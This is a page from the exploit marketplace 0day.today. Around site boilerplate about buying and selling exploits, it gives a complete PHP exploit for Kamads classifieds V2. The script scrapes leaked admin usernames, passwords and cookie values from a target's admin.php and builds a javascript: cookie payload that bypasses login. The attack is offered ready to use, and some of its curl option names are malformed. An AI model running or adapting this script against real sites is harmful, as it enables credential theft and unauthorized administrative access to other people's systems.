0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kamads classifieds V2 admin Disclosure / AuthBypass exploit
<?php if ($argc < 2) { echo "\n+-----------------------------------------------------------------+\n"; echo "| Kamads classifieds V2 admin Disclosure & (AuthBypass) insecure exploit |\n"; echo "| By Mr.tro0oqy |\n"; echo "| uxxd@hotmail.com |\n"; echo "+-----------------------------------------------------------------+\n"; print "\nUsage........: php $argv[0] <host><path><admin.php>\n"; print "\nex...........: php $argv[0] http://www.target.com/V2A_XHTML/admin/admin.php\n"; die(); }else { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"$argv[1]"); $op1 = curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch,COOKIESESSION,true); curl_setopt($ch,CUSTOMREQUEST,"get"); $x = curl_exec($ch); if ($t = stristr($x,"username = ") and stristr($x,"password = ")) { echo "\n"; echo "\n"; echo $new = substr($t,0,94); if ($co=stristr($x,"theCookieName") and $co2=stristr($x,"theCookieValue")) { echo "\n"; echo "\n"; echo $new2 = substr($co,0,35); echo "\n"; echo $new3 =substr($co2,0,40); echo "\n"; echo "\n"; $ja = substr($new2,17,15); echo "\n"; $ja2 = substr($new3,18,18); echo "\n"; echo "\n"; echo "\n"; echo $exploit = "javascript:document.cookie=\"$ja=$ja2;path=/\";"; echo "\n"; echo "\n"; echo "\n"; } }else { echo "not found"; } } ?> # 0day.today [2024-11-16] #